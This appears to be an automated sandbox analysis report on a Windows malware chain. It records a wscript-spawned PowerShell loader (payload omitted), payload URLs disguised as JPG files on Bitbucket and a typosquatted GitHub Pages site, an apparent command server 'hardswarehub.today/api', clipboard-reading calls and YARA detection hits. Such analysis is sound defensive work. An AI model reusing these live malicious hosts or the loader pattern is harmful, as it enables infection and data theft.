                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                            Source: powershell.exe, 00000012.00000002.2277471538.0000021B910A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.status.atlassian.com/
Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bqlf8qjztdtr.statuspage.io
Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365013157.00000232A505A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365868415.00000232A5081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1364793254.00000232A5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365832294.00000232A5068000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000000.00000002.1365868415.00000232A5081000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365013157.00000232A505A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1364793254.00000232A5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365832294.00000232A5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365684533.00000232A5029000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365721716.00000232A503F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365813986.00000232A5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364812176.00000232A5062000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: svchost.exe, 00000000.00000003.1364793254.00000232A5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365832294.00000232A5068000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365684533.00000232A5029000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hardswarehub.today/
Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2280963238.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hardswarehub.today/api
Source: MSBuild.exe, 00000017.00000002.2280963238.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hardswarehub.today/apiLv
Source: MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hardswarehub.today/apigQP
Source: MSBuild.exe, 00000017.00000002.2282061438.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hardswarehub.today:443/api
Source: powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/login
Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fdgfgdffffffff
Source: powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/logout
Source: powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/manage-profile/
Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ofice365.github.io
Source: powershell.exe, 00000012.00000002.2277471538.0000021B910A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381411000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ofice365.github.io/1/test.jpg
Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://preferences.atlassian.com
Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: soft.exe, 00000005.00000002.1722674324.0000000009C94000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://t.co/
Source: soft.exe, 00000005.00000002.1722674324.0000000009CAE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://t.co/09AZaz
Source: soft.exe, 00000005.00000002.1722674324.0000000009C94000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://t.co/https://t.co/
Source: svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic
Source: svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.v
Source: svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1365036015.00000232A5049000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000003.1364932490.00000232A505D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365684533.00000232A5029000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvsXG
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: soft.exe | String found in binary or memory: https://twitter.comif-unmodified-sinceillegal
Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
Source: N7LnRW81Rfq.exe, 0000000B.00000003.1801319421.00000000021D1000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.exe, 0000000B.00000002.2528478114.00000000021D1000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.exe, 0000000B.00000003.1801238876.0000000002400000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000002.2530459277.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000003.1803627841.0000000002148000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000003.1803547618.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000002.2531136083.0000000002148000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown | Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown | Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown | Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown | Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown | Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49973 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49978 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49979 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49980 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49981 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49982 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49983 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.7:49984 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 23_2_00440AF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard

System Summary

Source: 00000005.00000002.1724312184.000000000A03E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000005.00000002.1724312184.0000000009FAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000005.00000002.1724312184.0000000009F58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: ssdtoolbox.exe.12.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SSDToolBox.exe.13.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[encoded PowerShell payload omitted]'"
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0042F594 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00423B94 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_004125E8 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00479380 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe | Code function: 11_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Code function: 14_2_00007FF7444E2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe | Code function: 14_2_00007FF7444E1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe | Code function: 11_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_00470C74
Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp | Code function: 12_2_0043533C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004813C412_2_004813C4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046784812_2_00467848
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004303D012_2_004303D0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0044453C12_2_0044453C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004885E012_2_004885E0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0043463812_2_00434638
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00444AE412_2_00444AE4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0048ED0C12_2_0048ED0C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00430F5C12_2_00430F5C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045F16C12_2_0045F16C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004451DC12_2_004451DC
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045B21C12_2_0045B21C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004455E812_2_004455E8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0048768012_2_00487680
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046989C12_2_0046989C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00451A3012_2_00451A30
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0043DDC412_2_0043DDC4
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_0040100013_2_00401000
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_004067B713_2_004067B7
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609660FA13_2_609660FA
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6092114F13_2_6092114F
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6091F2C913_2_6091F2C9
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096923E13_2_6096923E
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093323D13_2_6093323D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095C31413_2_6095C314
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095031213_2_60950312
